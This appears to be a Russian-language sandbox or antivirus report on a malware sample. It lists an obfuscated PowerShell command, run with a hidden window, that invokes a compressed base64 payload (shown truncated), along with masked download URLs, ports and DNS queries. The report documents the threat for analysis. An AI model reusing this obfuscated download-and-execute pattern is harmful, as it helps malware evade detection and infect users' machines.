Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((Gv '*MDr*').NamE[3,11,2]-joIN'')(NEW-ObjECt SYSTEm.io.coMpREsSioN.DeflaTeSTreaM([SYStem.Io.memorysTReAM][cOnvERT]::fRombASe64StrING( 'PZBRa8IwFEb/Sh8CsTiTOV82Q0HYlO1FFIduYy9pemejaVJvr3Yq/v...
- 'de####tureboer.nl':80
- 'am#.gov.co':80
- 'am#.gov.co':443
- http://www.de####tureboer.nl/p/
- http://am#.gov.co/re1PN/
- 'am#.gov.co':443
- DNS ASK de####tureboer.nl
- DNS ASK li####na.barcelona
- DNS ASK me######geriatrica.com.br
- DNS ASK ri#####amindonesia.com
- DNS ASK am#.gov.co
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((Gv '*MDr*').NamE[3,11,2]-joIN'')(NEW-ObjECt SYSTEm.io.coMpREsSioN.DeflaTeSTreaM([SYStem.Io.memorysTReAM][cOnvERT]::fRombASe64StrING( 'PZBRa8IwFEb/Sh8CsTiTOV82Q0HYlO1FFIduYy9pemejaVJvr3Yq/v...' (со скрытым окном)